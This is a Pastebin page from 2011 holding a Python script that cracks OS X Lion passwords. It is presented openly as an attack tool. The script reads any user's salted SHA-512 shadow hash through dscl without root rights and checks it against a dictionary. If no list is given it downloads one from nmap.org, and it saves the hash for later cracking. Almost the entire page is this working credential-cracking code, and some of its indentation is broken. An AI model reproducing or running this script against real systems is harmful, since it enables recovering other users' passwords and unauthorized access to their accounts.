defenceindepth

OS X Lion Password Cracker

Sep 18th, 2011
32,658
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. ##########################################
  2. #* OS X Lion 10.7 Password Cracker
  3. #* UID 0 NOT required
  4. #*
  5. #* Usage:
  6. #* python lion_crack.py [username] [dictionary]
  7. #*
  8. #*
  9. #* Patrick Dunstan
  10. #* Sep 18, 2011
  11. #* http://www.defenceindepth.net
  12. #*
  13. ###########################################
  14. from subprocess import *
  15. import hashlib
  16. import os
  17. import urllib2
  18. import sys
  19. from string import *
  20.  
  21. link = "http://nmap.org/svn/nselib/data/passwords.lst" # Online password file
  22. defaultuser = False
  23. username = ""
  24.  
  25. def check(password): # Hash password and compare
  26.        
  27.     if not password.startswith("#!"): # Ignore comments
  28.  
  29.         guess = hashlib.sha512(salt_hex + password).hexdigest()
  30.         print("Trying... " + password)
  31.    
  32.         if guess == hash:
  33.             print("Cleartext password for user '"+username+"' is : "+password)
  34.             exit(0)
  35.  
  36. if len(sys.argv) < 2:
  37.     print("No username given. Defaulting to current user.")
  38.     defaultuser = True
  39. else:
  40.     username = sys.argv[1]
  41.  
  42. p = Popen("whoami", shell=True, stdout=PIPE)
  43. whoami = p.communicate()[0]
  44.  
  45. if defaultuser:
  46.     username = whoami.rstrip()
  47.  
  48. p = Popen("dscl localhost -read /Search/Users/" + username, shell=True, stdout=PIPE)
  49. dscl_out = p.communicate()[0]
  50.  
  51. list = dscl_out.split("\n")
  52.  
  53. for pos,item in enumerate(list): # extract digest
  54.     if "dsAttrTypeNative:ShadowHashData" in item:
  55.         digest = list[pos+1].replace(" ", "")
  56.  
  57. if len(digest) == 262: # Out of box configuration  
  58.     salt = digest[56:64]   
  59.     hash = digest[64:192]
  60. elif len(digest) == 314: # SMB turned on
  61.     print("SMB is on")
  62.     salt = digest[104:112]
  63.     hash = digest[112:240]
  64. elif len(digest) == 1436: # Lion Server
  65.     salt = digest[176:184]
  66.     hash = digest[176:304]
  67. elif len(digest) == 1492: # Lion Server with SMB
  68.     salt = digest[224:232]
  69.     hash = digest[232:360]
  70.  
  71. print("SALT : " + salt)
  72. print("HASH : " + hash)
  73.  
  74. salt_hex =  chr(int(salt[0:2], 16)) + chr(int(salt[2:4], 16)) + chr(int(salt[4:6], 16)) + chr(int(salt[6:8], 16))
  75.  
  76. if len(sys.argv) == 3: # If dictionary file specified
  77.         print("Reading from dictionary file '"+sys.argv[2]+"'.")
  78.         check(whoami.rstrip())
  79.     passlist = open(sys.argv[2], "r")
  80.         password = passlist.readline()
  81.  
  82.         while password:
  83.                 check(password.rstrip())
  84.                 password = passlist.readline()
  85.         passlist.close()
  86.  
  87. else: # No dictionary file specified
  88.         print("No dictionary file specified. Defaulting to hard coded link.")
  89.        
  90.     passlist = urllib2.urlopen(link) # Download dictionary file
  91.         passwords = passlist.read().split("\n")
  92.     print("\nPassword list successfully read")
  93.    
  94.     passwords.append(whoami.rstrip())  
  95.    
  96.     print("\nCracking...")
  97.         for password in passwords:
  98.                 check(password)
  99.  
  100. # Save hash for later
  101. print("\nSaving hash to "+username+".hash...")
  102. out = open(username+".hash", "w")
  103. out.write(salt+hash)
  104. out.close()
  105.  
  106. print("\nPassword not found. Try another dictionary.\n")
RAW Paste Data

Adblocker detected! Please consider disabling it...

We've detected AdBlock Plus or some other adblocking software preventing Pastebin.com from fully loading.

We don't have any obnoxious sound, or popup ads, we actively block these annoying types of ads!

Please add Pastebin.com to your ad blocker whitelist or disable your adblocking software.

×